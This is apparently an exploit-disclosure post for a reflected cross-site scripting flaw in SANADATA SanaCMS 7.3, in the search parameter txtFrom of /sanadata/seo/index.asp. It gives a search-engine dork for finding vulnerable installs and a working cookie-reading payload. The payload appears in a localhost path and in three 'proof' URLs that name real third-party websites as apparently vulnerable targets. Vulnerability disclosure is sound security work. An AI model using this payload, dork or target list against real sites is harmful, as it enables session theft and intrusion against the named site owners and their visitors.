Cross Site Scripting injection vulnerability in SANADATA SanaCMS 7.3


Cross-site scripting (XSS) vulnerability in /sanadata/seo/index.asp in SANADATA SanaCMS 7.3 allows remote attackers to inject arbitrary web script or HTML via the search parameter.


A Vendor HomePage: https://www.sanadata.com/


A Version : 7.3


A Dork : intext:"SANADATA | SanaCMS 7.3"


A Tested on:Firefox Browser


Vulnerability Path : http://127.0.0.1/sanadata/seo/index.asp?txtFrom="><img src=x onerror=alert(document.cookie)>&txtRank=&txtSite=


Proof :

http://www.esmhome.com/sanadata/seo/index.asp?txtFrom="><img src=x onerror=alert(document.cookie)>&txtRank=&txtSite=

http://www.miladenoor.org/sanadata/seo/index.asp?txtFrom="><img src=x onerror=alert(document.cookie)>&txtRank=&txtSite=

http://www.aradcharta.com/sanadata/seo/index.asp?txtFrom="><img src=x onerror=alert(document.cookie)>&txtRank=&txtSite=




暂无评论

发布评论